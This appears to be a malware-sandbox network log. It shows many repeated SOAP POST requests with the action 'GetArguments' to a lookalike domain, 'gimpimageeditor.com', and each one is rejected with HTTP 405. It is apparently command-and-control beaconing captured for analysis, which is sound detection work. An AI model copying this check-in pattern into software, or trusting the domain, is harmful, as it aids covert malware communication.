                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:02.201529980 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:02.313082933 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:03.326663971 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:03.432178974 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:04.436088085 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:04.541470051 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:05.548147917 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:05.653629065 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:06.670619965 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:06.775815964 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:07.779886007 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:07.959919930 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:08.967164040 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:09.072896004 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:10.076741934 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:10.182617903 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:11.185903072 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:11.297015905 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:12.310993910 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:12.416781902 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:13.420578003 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:13.527098894 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:14.529805899 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:14.635246038 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:15.639317036 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:15.745646000 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:16.748404026 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:16.854811907 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:17.857785940 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:17.963527918 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:18.967091084 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:19.072510004 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:20.076759100 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:20.182404995 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:21.209369898 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:21.314785004 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:22.295396090 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:22.400969982 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:41.389132023 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:41.495105982 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:41.905000925 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:42.010983944 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:42.404814005 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:42.510662079 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:42.889292002 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:42.994890928 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:43.373269081 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:43.478837013 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:43.842629910 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:43.948839903 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:44.295281887 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:44.401406050 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:44.733510971 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:44.838865995 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:45.170202017 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:45.275662899 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:45.592263937 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:45.697760105 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:45.998400927 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:46.104008913 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:46.404712915 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:46.510498047 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:46.795207024 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:46.922837019 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:47.201355934 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:47.307749987 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:47.576476097 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:47.687115908 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:47.951613903 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:48.057534933 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:48.310834885 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:48.418662071 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:48.654884100 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:48.760708094 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:48.998632908 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:49.104809999 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:49.326364994 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:49.432244062 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:49.654653072 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
Host: gimpimageeditor.com
Content-Length: 137
Expect: 100-continue
Accept-Encoding: gzip, deflate
Jan 17, 2025 06:53:49.760078907 CET  54  IN  HTTP/1.1 405 Method Not Allowed
content-length: 0
Jan 17, 2025 06:53:49.967123985 CET  216  OUT  POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
Host: gimpimageeditor.com
Content-Length: 137
Expect: 100-continue
Accept-Encoding: gzip, deflate
Jan 17, 2025 06:53:50.072853088 CET  54  IN  HTTP/1.1 405 Method Not Allowed
content-length: 0
                                                                                                                        Jan 17, 2025 06:53:55.982745886 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:56.088217974 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:56.185915947 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:56.291475058 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:56.388959885 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:56.495758057 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:56.592538118 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:56.697911978 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:56.779576063 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:56.891376019 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:56.982624054 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:57.089085102 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:57.170120955 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:57.275569916 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:57.357774019 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:57.463545084 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:57.545304060 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:57.652070999 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:57.732644081 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:57.838203907 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:57.904496908 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:58.010360003 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:58.076441050 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:58.186618090 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:58.248420000 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:58.353944063 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:58.420393944 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:58.526032925 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:58.592437983 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:58.698016882 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:58.764004946 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:58.869761944 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:58.935750961 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
